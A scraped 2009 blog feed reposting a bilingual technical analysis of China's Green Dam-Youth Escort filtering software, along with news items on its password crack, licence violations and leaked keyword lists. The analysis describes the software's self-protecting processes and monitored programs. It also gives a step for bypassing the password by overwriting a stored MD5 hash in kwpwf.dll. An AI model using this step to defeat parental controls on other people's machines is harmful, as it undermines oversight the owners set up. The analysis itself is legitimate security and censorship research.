href="http://bbs.lssw365.net/lvhang/index.php/List/index/pid/2/sort/6">家庭版</a>,<a href="http://bbs.lssw365.net/lvhang/index.php/List/index/pid/2/sort/16">厂商版</a>,<a href="http://bbs.lssw365.net/lvhang/index.php/List/index/pid/2/sort/17">渠道版</a>,<a href="http://bbs.lssw365.net/lvhang/index.php/List/index/pid/2/sort/18">网吧版</a>以及<a href="http://bbs.lssw365.net/lvhang/index.php/List/index/pid/2/sort/19">校园版</a>(家庭版与校园版经校验后发现完全一致,没有发现有官员版)。With the Ministry of Industry and Information Technology, Ministry of Education, Ministry of Finance and State Council Information Department as its partners, Greed Dam currently offers Family, Commercial, Organization, Internet Bar and Campus Editions. <br /><br />公开宣称的功能: 针对10-16岁青少年,过滤色情图片、色情内容、暴力内容、过滤反审查软件(例如无界)。 <br />潜在功能:过滤政治内容?<br />Stated features: To protect minors from age 10-16 through the filtering of pornographic and violent images and content, also circumvention software.<br />Latent features: To filter political content?<br /><br />还有一个绿坝网络版,在 http://www.zzjinhui.com/down/newServerCard.rar 可以下载。<br />There also exists a Network Edition of Green Dam, which can be downloaded here (.rar).<br />适用性 Applicability<br />虽然产品声明的目标是针对10-16岁青少年,但是产品的约定安装机器并没有选择性,产品缺省假设每台被安装的机器都是青少年使用。目前该产品只提供Windows 版本,对IE、Google Chrome(因为采用了系统的网络设置)有效,对Firefox 无效。软件屏蔽的不良信息包括时政类的不良信息,软件并非采用一般软件的安装方式,对Firefox无效,关闭浏览器及将网址加入黑名单无确认。在IE下 ,对明显属于时政类“不良信息”的信息判断不稳定。对色情类“不良信息”的网页判断较准。换成Firefox后,软件没反应。 <br />Current versions only support Windows; effective only when used in conjunction with Internet Explorer or Google Chrome, it has no effect when used with Firefox. The harmful information screened by the software includes politically-related harmful information, and the software relies on non-conventional methods to install, also ineffective within Firefox, closing the browser and adding the website address onto a banned list without confirmation. In Internet Explorer, the software's ability to classify clearly political content as "harmful information" is unreliable; for pornographic content, Green Dam is able to make relatively accurate assessments. When used with Firefox, however, the software shows no response.<br /><br />产品当前支持的兼容性列表 <br />Compatibility list of currently supported projects<br /><br />序号 项目 内容 备注 Sequence / Item / Content/ Notes<br />操作系统 Operation Systems<br />1 Win98 兼容 不支持屏幕文字监控 1. Windows 98, compatible, text screening not supported<br />2 Win2000 兼容 2. Windows 2000, compatible<br />3 Winxp 兼容 3. Windows XP, compatible <br />4 Win vista 兼容 安装升级和卸载需管理员身份 4. Windows Vista, compatible, updates and uninstall can only be performed through User Account Control.<br />浏览器 Browsers<br />1 IE6.0/7.0 兼容 1. Internet Explorer 6.0/70, compatible <br />2 Opera 9.5 兼容 2. Opera 9.5, compatible <br />3 Firefox 2.0 兼容 3. Firefox 2.0, compatible <br />4 Netscape 9.0 兼容 4. Netscape 9.0, compatible <br />5 腾讯TT 3.0 兼容 5. Tencent Traveler 3.0, compatible <br />6 Maxthon 2.0 兼容 6. Maxthon 2.0, compatible <br />办公软件 Office Software<br />1 MS Office2003 兼容 1. Microsoft Office 2003, compatible <br />2 金山WPS 2007 兼容 2. Kingsoft WPS 2007, compatible <br />3 永中Office2007 兼容 Evermore Office 2007, compatible <br />杀毒软件 Anti-virus Software<br />1 卡巴斯基6/7 兼容 1. Kaspersky 6/7, compatible <br />2 瑞星19 兼容 2. Rising 19, compatible <br />3 江民2008 兼容 3. Jiangmin 2008, compatible <br />4 诺顿2008 兼容 4. Norton 2008, compatible <br />5 McAfee2008 兼容 5. McAfee 2008, compatible <br /><br />技术架构分析 Technical Framework Analysis <br />程序结构 software architecture <br />绿坝-花季护航”所有的文件都安装在系统目录(%WinDir%和%WinSysDir%)下,程序菜单没有提供卸载入口,后发现卸载功能在主程序的一个菜单里。在启用“绿坝-花季护航”的图片过滤功能时,软件自动清除的浏览器缓存。<br />All files within "Green Dam-Youth Escort" are installed to the system directory (%WinDir% and %WinSysDir%), and while no means to uninstall are provided in the Applications menu, the option to uninstall can be found in a menu within the main program. When launching Green Dam's image filtering function, the software automatically clears the browser cache.<br /><br />在%WinDir%目录下的xstring.s2g存放着该软件所有文件的安装路径。Within xstring.s2g, located in the Windows directory, there can be found all the installation paths for all the program's files.<br /><br />运行时加载的模块: <br />驱动: C:Windows\system32\Drivers\mgtaki.sys<br />服务: C:Windows\MPSvcC.exe<br />启动项: C:Windows\system32\xnet2.exe<br />During operation, Green Dam installs the following modules:<br />Drivers: C:Windows\system32\Drivers\mgtaki.sys<br />Service: C:Windows\MPSvcC.exe<br />Launch: C:Windows\system32\xnet2.exe<br /><br />经鉴定 ,是XDaemon.exe、XNet2.exe、gn.exe三个程序相互保护,防止被删掉和结束进程。 这是一种通常被病毒和流流氓软件所使用的技术。<br />Following evaluation, three applications, XDaemon.exe, XNet2.exe and gn.exe, can be seen to be protecting one another, preventing each process from being deleted or interrupted, a kind of technique used by malware...<br /><br />绿坝将密码用MD5算法转换后,以文本方式保存在system32目录下的kwpwf.dll文件中。以记事本打开该文件,以“D0970714757783E6CF17B26FB8E2298F”替换其内容后保存,即可将密码恢复为初始密码“112233”。<br />After Green Dam converts the password using the MD5 algorithm, it saves it in text format within the kwpwf.dll file located in the C:\WINDOWS\system32 directory. When opened using Notepad, if the content is then replaced with "D0970714757783E6CF17B26FB8E2298F" and saved, the password can then be restored to the original "112233". <br /><br /><br />绿坝的通过网络<a href="http://www.zzjinhui.com/softpatch/">自动更新</a>,同目录下里面还包含<a href="http://www.zzjinhui.com/softpatch/Image0.jpg">一张美女图</a>不知是何用意。在经过网络用户的分析后,发现 <a href="http://www.zzjinhui.com/softpatch/kwupdate.dat">http://www.zzjinhui.com/softpatch/kwupdate.dat</a> 此文件和屏蔽关键词和URL有关。有2个相关IP:211.161.1.134和 203.171.236.231,其中第二个IP指向 河南省郑州市景安计算机网络技术有限公司。(zzidc.com.cn)——(已失效)<br />Green Dam updates automatically online, and the update address is: http://www.zzjinhui.com/softpatch/; found therein is a pretty woman picture http://www.zzjinhui.com/softpatch/Image0.jpg although its purpose is unknown. Following analysis by Internet users, it was discovered that the file http://www.zzjinhui.com/softpatch/kwupdate.dat is related to the filtering of keywords and URLs. Connected to that are two IP addresses: 211.161.1.134 and 203.171.236.231; the second of the IP addresses belongs to Zhengzhou Giant Computer Network Technology Co. Ltd. in Henan province. (zzidc.com.cn) - (unavailable since yesterday)<br /><br />内容检测技术 contents detection methods<br />图像过滤 Image filtering<br />图像检测进程从待检图像队列中获取图像数据,先归一化图像尺寸,然后分离肤色区域和非肤色区域,在对肤色区域关系进行分析后去除干扰,提取区域的特征送入已训练SVM分类器。当图像被检为色情图像后送入人脸检测器,若人脸不是主要部分便确定为色情图像。这套算法的主要问题是,色情图像的识别严重依赖于肤色和肤色形状;而最后使用人脸检测加权判定也只是手工打补丁避免出现大幅人脸识别为色情图像问题的办法,且经验权值可靠性缺乏验证。<br />The process of image detection begins when visual data is obtaining as the image is in queue to be screened, first normalizing the image's size, then separating areas of skin tone from those without skin tone; analysis of the relationship between areas of skin tone is followed by removal of noises, then extraction of the area's characteristics, which are then input into a trained SVM classifier. Once the image has been deemed pornographic it is sent to a human face detector; if a human face is not the primary component, the image is then classified as pornography. The main problem with this algorithm is that recognition of pornographic images relies heavily on skin color and shape, and the final use of a human face detector in a weighted judgment is only a manual patch aimed at preventing the problematic occurrence of large faces being identified as pornography, but also the reliability of empirical weighting lacks verification.<br /><br />从XFImage.xml可观察到,绿霸使用了OpenCV的haar分类器进行人脸检测。绿霸附带的cximage.dll、CImage.dll、xcore.dll和Xcv.dll也来自OpenCV的库文件。都反映出绿霸主要使用了OpenCV来进行图像方面的处理。不过就像一般国产软件的做法,绿霸大概也无视了OpenCV的BSD许可证。<br />From XFImage.xml it can be observed that Green Dam uses OpenCV's Haar classifier in undergoing human face detection. Included with Green Dam, cximage.dll, CImage.dll, xcore.dll and Xcv.dll, also library files from OpenCV. This all suggests that Green Dam primarily uses OpenCV to process images. However, as is done with much of domestic Chinese software, Green Dam has disregarded OpenCV's BSD license. <br /><br />金惠公司承诺图像检测正检率>90%,误检率<7%,而检出率 = 正检率*色情图像比例 + (1 – 误检率)*(1–色情图像比例),在色情图像占1%时,检出率为93%。<br />Jinhui Corporation has committed to an accurate image detection rate of higher than 90%, and a false detection rate of less than 7%, with the detection rate=accurate detection rate*proportion of pornographic images+(1-false detection rate)*(1-proportion of pornographic images); with 1% of images being pornographic, the detection rate would be 93%.<br /><br />文字过滤 Text filtering<br />对政治性内容的分析,包括法轮功内容的过滤,使用了北京大正语言知识处理科技有限公司提供的文字过滤引擎HncEng.exe、HncEngPS.dll、SentenceObj.dll,数据文件HNCLIB/FalunWord.lib 中还包含以UTF-32LE编码的除法轮功外大量政治和色情有关的词汇。<br />An analysis of political content, including the filtering of Falun Gong-related content, shows that used is Beijing Dazheng Language Technology Co. Ltd.'s text filtering engine, HncEng.exe, HncEngPS.dll and SentenceObj.dll, and within data file HNCLIB/FalunWord.lib, in UTF-32LE code, aside from Falun Gong there can also be found a large glossary related to political and pornographic content.<br /><br />从数据文件HNCLIB/FalunWord.lib中分析出来的<a href="http://filetwt.com/f/bn734dm89h">关键词列表</a>;更完整的解析出的<a href="https://docs.google.com/View?docid=d7w7twp_977hcmc35g3">关键词</a>。<br /><br />UMich的团队报告通过反向工程解出了绿霸安装在system32下的若干dat加密文件的解码方式,经过解码发现多数dat文件来自美产过滤软件CYBERsitter的关键字列表,另外几个dat文件(xword?.dat)则主要包含关于色情、政治和法轮功的词汇。<br />Team from UMich has developed decoding program for encrypted dat files in system32 by reverse-engineering, found that many of the encrypted files appear to be blacklists from the US-made CYBERsitter censorware circa 2006, and other interesting files include xword?.dat contain vulgarities and political terms relating to Falun Gong.<br />应用程序屏蔽 Application screening<br />对应用程序使用时间的控制 Regarding control over application usage time <br /><br />金惠公司称,绿霸可以禁止各种网络游戏(如征途、魔兽世界)、聊天(如QQ、MSN)等程序,定制黑白名单过滤实效更强,阻断以代理服务器或代理类软件而躲避网址屏蔽的匿名浏览(如自由门) (金惠堵截黄色图像及不良信息专家系统FAQ-20080520)。<br />Jinhui claims that Green Dam can disable kinds of online game, instant messager with customizable blacklists and whitelists for effectiveness, meanwhile block some anonymous browsing proxy software such as FreeGate.<br /><br />在system32中的filtport.dat 文件 ,默认内容是FreeGate/8567/tcp Urf/9666/tcp,推测就是对自由门和无界软件进行屏蔽的配置文件。 <br />两个进程:xdaemon.exe和xnet2.exe,进入无界页面会..... <br />Screening of anticircumvention software, such as FreeGate. In system32 there can be found a filtport.dat file whose default content reads: FreeGate/8567/tcp Urf/9666/tcp. Two processes, xdaemon.exe and xnet2.exe, upon entering FreeGate will......<br /> <br />控制技术 controlling techniques<br />金惠公司称,绿霸软件能够控制未成年人上网、QQ、MSN及游戏的时间,避免过度沉溺于网络,有效戒除网瘾(谈判响应书);Jjinhui claims that Green Dam can controls the time minors spend online, using QQ or MSN, and playing games; by preventing overindulgence of the Internet, Green Dam effectively eliminates Internet addiction.<br /><br />应用程序监控 application monitoring<br />经过测试,发现如果在记事本或者WordPad中输入任何“法轮功”字样,都会关闭应用程序,但是在绘图板和MSN中输入这些字则不会有反应,这也说明其程序的不完备性。Testing has shown that if any word resembling "Falun Gong" is entered into either Notepad or WordPad, the application will shut down; however, typing the same characters into Paint or MSN Messenger bears no response, illustrating the incompleteness of the the program.<br /><br />部分反编译的内容发现有多种应用程序是其监控的对象。<br />A segment of decompiled content shows the extent of the Green Dam's monitoring.<br /><br />00468940 .wow.exe.魔兽世界....yaho<br />00468980 omessenger.exe..雅虎通..wangwang.exe....阿里旺旺....start.exe...<br />004689C0 网易POPO....网易popo....uc.exe..新浪UC..新浪uc..icq.exe.ICQ6....<br />00468A00 icq6....skype.exe...Skype...skype...eph.exe.e话通...doshow..msnm<br />00468A40 sgr.exe.MSN.msn messenger...qqgame.exe..QQ游戏..qq游戏..qqchat.e<br />00468A80 xe..QQ聊天室....qq聊天室....qq.exe..QQ..qq2.bitbomet.exe....BitC<br />00468AC0 omet....bitcomet....<br /><br />从injlib.exe中(偏移地址0x89e8)提取出的字串,反映出一部分可能受监控的程序: <br />Possibly monitored programs (found in injlib.exe, offset 89e8H): <br /><br />editplus.exe uedit32.exe emeditor.exe wordpad.exe notepad.exe wps.exe wpp.exe et.exe powerpnt.exe frontpg.exe excel.exe msaccess.exe outlook.exe winword.exe mailmagic.exe popo.exe<br />qqmail.exe aixmail.exe imapp.exe incmail.exe msimn.exe dm2005.exe foxmail.exe googletalk.exe miranda32.exe imu.exe ypager.exe tmshell.exe start.exe uc.exe icqchatrobot.exe qq.exe msnmsgr.exe gsfbwsr.exe greenbrowser.exe touchnet.exe theworld.exe maxthon.exe ttraveler.exe netscp.exe ge.exe firefox.exe opera.exe netcaptor.exe myie.exe iexplore.exe mmc.exe regedit.exe taskmgr.exe <br />mpsvcc.exe <br />xdaemon.exe <br />xnet2.exe <br /><br />几乎市面上所有常见文本编辑工具(EditPlus, UltraEdit, EmEditor)、办公软件(WPS三部件,MS Office系列)、邮件客户端、IM客户端、浏览器都会受到监视。<br />It seems that nearly all text editors on the market (EditPlus, UltraEdit, EmEditor), office software suites (WPS, MS Office), e-mail clients, instant messaging clients and browsers, are being monitored.<br /> <br />网络监控 Internet monitoring<br />金惠公司在文档中称,“绿坝”通过Winsock2的SPI接口获取发送和接收的数据,对这些数据进行分析,获取HTTP数据,将HTTP协议数据解析后,经过URL检测器,不良URL检测器和关键字检测器后,根据检测结果决定是否需要使用图像检测器,通过图像检测将新发现的不良网址提供给系统管理员。 <br />In documentation, Jinhui claims that "Green Dam" utilizes the Winsock2 SPI port to obtain data from both sender and recipient, and through analyzing these data, obtains http data. Having obtained http data protocol and run through a URL detector, a harmful URL detector and a keyword detector, Green Dam decides based on those results whether or not image detection is needed, and through image detection, addresses of websites containing harmful information are delivered to system management.<br /> <br /><br />用户体验 user experience<br />通过实际测试和用户反馈,发现绿坝的宣称功能的实现能力并不强,却没有避免在各个层面添加很多没有宣称的功能。部分用户的使用体验和讨论:Through testing and user feedback, it has been noted that Green Dam's ability to achieve its stated function is in fact not that strong, and has not avoided including many additional undisclosed functions situated at various levels. Here is a sample of some users' user experiences and discussion:<br />http://blog.sina.com.cn/s/blog_4b862d070100doj4.html <br />http://club.cat898.com/newbbs/dispbbs.asp?BoardID=1&id=2853590 <br />http://www.meirendaddy.com/blog/?p=404 <br />http://tieba.baidu.com/f?kz=591097210 <br /><br />知识产权侵害 copyright infringement<br />绿霸受到以下指控:<br />违反BSD许可证在软件中使用OpenCV库<br />将OpenCV的算法和技术用于申请专利<br />抄袭美产过滤软件CYBERsitter的关键字列表(猜测应该还有更多代码抄袭)<br />证据请见前。<br />潜在风险 vulnerabilities<br />后门:绿霸本身的安全性就有很大疑问,这样一款小公司开发的软件很容易存在安全漏洞,一旦被黑客发现,则所有安装绿霸的电脑都成为黑客的“肉鸡”,如果其安装量大的话,完全有可能重演“暴风影音断网”的事件。 <br /><br />因为绿坝软件本身的多种不完善性,可能会导致客户端正常软件功能的失效(例如,关闭没有保存的正常工作文档而不提示保存)。 <br /><br />因为该软件所有技术参数的设置,都基于科技人员本人对于什么是色情图片的假设。这些假设反而强化了色情的窠臼和性/别不平等,对青少年不利。 <br /><br />媒体报道 media coverage<br />(可能不属于技术分析报告,仅作参考)<br />(maybe off-topic, for information only)<br /><br />中国收紧互联网控制(华尔街日报) <br />工业和信息化部文件 <br />下月起新售个人电脑将预装上网过滤软件(网易科技) <br /> “绿坝·花季护航”上网管理软件试用测评 <br /> 外交部发言人反驳“你有孩子吗?” <br />“绿坝”为何遭质疑 (财经网) <br />上网过滤软件绿坝官网遭黑客攻击无法访问(新浪科技) <br /><br /><br />相关文件 links <br />绿坝与政府的谈判响应书:https://docs.google.com/fileview?id=F.17d2bb7b-bddd-4e3e-a2a1-00d2ec5e569f&hl=zh_CN <br /><br />“绿坝—花季护航”使用全攻略 http://tech.techweb.com.cn/redirect.php?tid=387273&goto=lastpost<br /><br />有人对与此软件有关的大正公司的一些文件进行了分析。 通过对<a href="http://www.hncit.com/update/ST771.rar">ST771.rar</a>的分析,对ST771.rar\ST771\package2中hncldata_mdb.zip\L:\HncProjects\版权\检测版\升级包制作工具\2007.1.15\标准检测版\programfiles\hncldata.mdb进行分析后可以得到<a href="http://paste.ubuntu.org.cn/15292">网址黑名单</a>。在北京大正语言知识处理科技有限公司网站上还可以找到未加密的关键词文件: <a href="https://docs.google.com/View?id=ah27xz4pbz6s_22cgwh6xf7">测试版中的色情关键词</a>;<a href="https://docs.google.com/View?id=ah27xz4pbz6s_24c6dw27g6">非色情关键词</a>;<a href="https://docs.google.com/View?id=ah27xz4pbz6s_25fpx2qkhp">上级部门指示</a>。<br /><br /><br /><br /><br /><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-1545841738932509232009-06-11T13:02:00.000+08:002009-06-11T13:03:59.462+08:00绿坝软件侵犯BSD协议"轰轰烈烈的“绿霸-花季护航”流氓软件的事情大家都已经知道了,鉴于所谓的国情,很多事情都不说也罢了。抛开政治因素以单纯的技术角度看这个软件,尤其令人诧异的是这个流氓软件对BSD软件许可证肆无忌惮的践踏和侵权!请看<a href="https://docs.google.com/View?id=afk7vnz54wt_12f8jzj9gw">绿坝-花季护航软件技术分析</a>,请注意本文以下分析内容: <br />从 XFImage.xml可观察到,绿霸使用了OpenCV的haar分类器进行人脸检测。绿霸附带的cximage.dll、CImage.dll、 xcore.dll和Xcv.dll也来自OpenCV的库文件。都反映出绿霸主要使用了OpenCV来进行图像方面的处理。不过就像一般国产软件的做法,<a href="http://robbin.javaeye.com/blog/406125">绿霸大概也无视了OpenCV的BSD许可证。</a>"<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-34585320962398723852009-06-11T12:53:00.000+08:002009-06-11T13:04:19.784+08:00绿坝-花季护航软件遭破解 使用者绕开密码限制<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_r8EaiijILzk/SjCN_jdnm4I/AAAAAAAAFVA/dMdowLf0V6k/s1600-h/20090611123035e468d.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px; height: 220px;" src="http://4.bp.blogspot.com/_r8EaiijILzk/SjCN_jdnm4I/AAAAAAAAFVA/dMdowLf0V6k/s320/20090611123035e468d.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5345928880679525250" /></a><br />6月11日消息,工信部日前下文要求国内新售电脑必须预装一款名为绿坝-花季护航的绿色上网软件,而破解这款软件密码的方法近日在网上出现,可使该软件失去作用。<br /><br />该软件主要作用为主动屏蔽青少年上网的不良信息,而家长需要通过一个统一的初始密码对整个屏蔽方式进行监控。但据测试,上述破解方法可以很容易地替换掉家长设置的密码,使用者就可以实现绕开该软件随意上网。<br /><br />该软件实施方,绿色上网过滤软件项目工作组的在线客服人员向网易科技表示,软件的制作方面正在努力改进和完善软件,后续版本的软件会完善类似密码容易被破解的问题。目前最新的软件版本为3.17,不过这个版本已被证实可以破解。<br /><br />至于该软件的两家中标企业北京大正和郑州金慧公司,前者表示近期不接受外部采访,后者表示负责此事对外的经理出差,不知何时回公司。<br /><br />据专业人士解释,该破解方法是利用了该软件对密码保存的一个设计漏洞,因为这个密码文件很容易被找到,而密码的加密方式为MD5的方式,这个方式本身也并不保险。<br /><br />公开信息显示,工信部以总价4179万元的价格买下了绿坝-花季护航一年的使用权。据中央电视台报道,工信部将每年以政府采购的方式购买绿色上网软件,凡是技术强、过滤不良信息效果好的企业都可以参与竞争。<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-35289651701817323882009-06-11T06:44:00.001+08:002009-06-11T13:04:19.785+08:00绿坝 花季护航的过滤关键词匿名读者 写道 "北京大正语言知识处理科技有限公司网站上有未加密的关键字列表,虽然不是最新版,但还是可以管中窥豹,看看那些打着保护祖国花朵名号的人到底想干些什么。 <br /><a href="http://www.hncit.com/update/st18/package1/filterlib/flib/swl_txt.zip">色情关键字列表(zip)</a>显示:“黝黑”,“女士”,“卵细胞”,什么的也在其中。试验的小白鼠说,装了绿坝花季护航以后在word中输入“老师教学生玩摸球游戏”,word会被强制关闭,我一看,“玩摸”果然是关键字,不知输入“老师是位略显黝黑的女士”,word会不会被关闭。 <br />这个就是<a href="http://www.hncit.com/update/st18/package1/filterlib/flib/fwl_txt.zip">新版本中falunword.lib的原型(zip)</a>,falunword,文件名还是半中半洋,一如既往的搞笑。 <br />其中“良民”,“良善”,“良心”,“良心犯”,“良知”全部是关键字,为什么呢? <br />这个(zip)应该不是关键字列表,而是上级部门的一些指示,从指示内容可以清楚地了解到花季护航到底想要护些什么。从文件日期看,他们4,5年前就开始这么做了,可见招投标都是假的。问题是,这开发速度也太慢了吧。"<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1